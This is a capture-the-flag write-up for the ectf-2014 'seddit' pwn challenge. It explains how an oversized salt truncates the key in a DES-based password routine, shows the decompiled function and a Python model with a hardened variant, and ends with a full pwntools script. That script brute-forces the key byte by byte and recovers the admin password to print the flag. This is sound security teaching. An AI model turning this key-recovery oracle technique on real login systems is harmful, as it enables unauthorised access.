[BMZCTF-pwn] ectf-2014 seddit
2022-07-05 06:16:00 【Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi】
At first I saw a lot of overflows, but because of the canary none of them are usable. So I read the program from the beginning instead.
The program has three menu options:
- Read a username and a salt. In the background the key is appended to the salt to form the DES key, and the password is then computed from that key.
- Log in with a username and password. If the username is admin and verification succeeds, the flag is printed.
- Useless.
Obviously, if step 1 could be run as admin this would be trivial. It can't.
The overflow is in the salt: when the salt is shorter than 7 bytes it is padded to 7 bytes, and then 7 bytes of key are appended. When the salt is longer than 7 bytes, the number of key bytes used shrinks accordingly. When the salt is 13 bytes long, only the first byte of the key is used, so the key can easily be brute-forced one byte at a time. After that, just compute the password with DES and you're done.
unsigned __int64 __fastcall sub_400A04(__int64 a1, _QWORD *a2)
{
char v3[140]; // [rsp+20h] [rbp-B0h] BYREF
int fd; // [rsp+ACh] [rbp-24h]
char dest[16]; // [rsp+B0h] [rbp-20h] BYREF
char v6[8]; // [rsp+C0h] [rbp-10h] BYREF
unsigned __int64 v7; // [rsp+C8h] [rbp-8h]
v7 = __readfsqword(0x28u);
*a2 = 0LL;
*(_QWORD *)dest = 0LL;
fd = open("key", 0);
if ( strlen(byte_6020C0) <= 6 ) // salt shorter than 7 bytes is padded to 7; with a 13-byte salt only 1 byte of key is used, so the key can be brute-forced byte by byte
strncpy(&byte_6020C0[strlen(byte_6020C0)], "aaaaaaa", 7 - strlen(byte_6020C0));
strncpy(dest, byte_6020C0, strlen(byte_6020C0));
read(fd, &dest[strlen(byte_6020C0)], 7uLL); // key is written at offset strlen(salt)
dest[14] = 0; // the string is cut at 14 bytes, so a longer salt leaves fewer key bytes
close(fd);
DES_string_to_key(dest, v6);
DES_set_key(v6, v3);
DES_ecb_encrypt(a1, a2, v3, 1LL);
return __readfsqword(0x28u) ^ v7;
}
Alternatively, writing your own DES implementation is not necessarily easy; you can simply patch the original program so that it does not check for the admin username, and then obtain the password through the original program itself.
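As an added illustration, not part of the original writeup or the challenge binary, the following Python models the buffer construction in sub_400A04 above: the number of key bytes that reach DES_string_to_key depends on the caller-controlled salt length, and a hardened variant refuses oversized salts so every password always depends on the whole key. SAMPLE_KEY and the function names are assumptions for this model.

```python
# Model (not the binary's code) of how sub_400A04 assembles the DES input.
# dest is char[16]; the string is terminated at dest[14], so the number of
# key bytes that influence the password depends on the salt length chosen.
SALT_WIDTH = 7      # salts shorter than this are padded with 'a'
KEY_LEN = 7         # read(fd, ..., 7) reads 7 bytes of the key file
CUTOFF = 14         # dest[14] = 0 terminates the string

# Constructed sample key for the demonstration (not the challenge's real key).
SAMPLE_KEY = b"k3yFil3"


def des_input_vulnerable(salt: bytes, key: bytes) -> bytes:
    """Mirror the original construction for salts of up to 14 bytes: pad a
    short salt, copy it, append 7 key bytes at offset strlen(salt), cut at 14."""
    if len(salt) <= 6:
        # strncpy(&salt[strlen(salt)], "aaaaaaa", 7 - strlen(salt))
        salt = salt + b"a" * (SALT_WIDTH - len(salt))
    dest = salt + key[:KEY_LEN]   # strncpy(dest, salt, ...); read(fd, &dest[len], 7)
    return dest[:CUTOFF]          # dest[14] = 0


def key_bytes_used(salt_len: int) -> int:
    """How many real key bytes still affect the password for a salt length."""
    eff = max(salt_len, SALT_WIDTH)
    return max(0, min(KEY_LEN, CUTOFF - eff))


def des_input_fixed(salt: bytes, key: bytes) -> bytes:
    """Hardened variant: reject oversized salts instead of silently truncating
    the key, so the derived password always depends on all 7 key bytes."""
    if len(salt) > SALT_WIDTH:
        raise ValueError("salt longer than %d bytes" % SALT_WIDTH)
    if len(key) < KEY_LEN:
        raise ValueError("key file too short")
    return salt.ljust(SALT_WIDTH, b"a") + key[:KEY_LEN]


if __name__ == "__main__":
    for n in (2, 7, 10, 13):
        s = b"A" * n
        print(n, key_bytes_used(n), des_input_vulnerable(s, SAMPLE_KEY))
```

With a 13-byte salt the model shows a single key byte entering the derivation, which is exactly why the leak is cheap to exploit and why the fixed variant must fail closed on long salts.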
from pwn import *

local = 1
if local == 1:
    p = process('./pwn')
else:
    p = remote('node4.buuoj.cn', 28546)
elf = ELF('./pwn')
context.arch = 'amd64'


def getkey(salt):
    # option 1: the returned password is DES over the username, keyed by
    # salt + (14 - len(salt)) bytes of the key
    p.sendlineafter(b"What would you like to do? ", b'1')
    p.sendlineafter(b"Enter username:", b's')
    p.sendlineafter(b"Enter salt:", salt)
    p.recvuntil(b'Your password is: ')
    return p.recv(16)


def password():
    # run the locally patched copy (admin check removed) with the recovered key file
    tp = process('./pwn_local')
    tp.sendlineafter(b"What would you like to do? ", b'1')
    tp.sendlineafter(b"Enter username:", b'admin')
    tp.sendlineafter(b"Enter salt:", b'aaaaaaa')
    tp.recvuntil(b'Your password is: ')
    return tp.recv(16)


def getflag(password):
    p.sendlineafter(b"What would you like to do? ", b'2')
    p.sendlineafter(b"Enter username:", b'admin')
    p.sendlineafter(b"Enter password:", password)
    return p.recv()


key = b''
for i in range(13, 6, -1):
    salt = b'A' * i
    tmpkey = getkey(salt)  # uses the first 14 - i bytes of the real key
    print(tmpkey)
    for j in range(0x21, 0x80):
        # salt + known key bytes + one guessed byte fills the 14-byte buffer,
        # so no real key byte is used; an identical password means the guess is right
        tmp = getkey(salt + key + p8(j))
        if tmp == tmpkey:
            key += p8(j)
            print('key:', key)
            break
open('key', 'wb').write(key)
pwd = password()  # obtain admin's password from the local program
print(pwd)
context.log_level = 'debug'
print(getflag(pwd))
pause()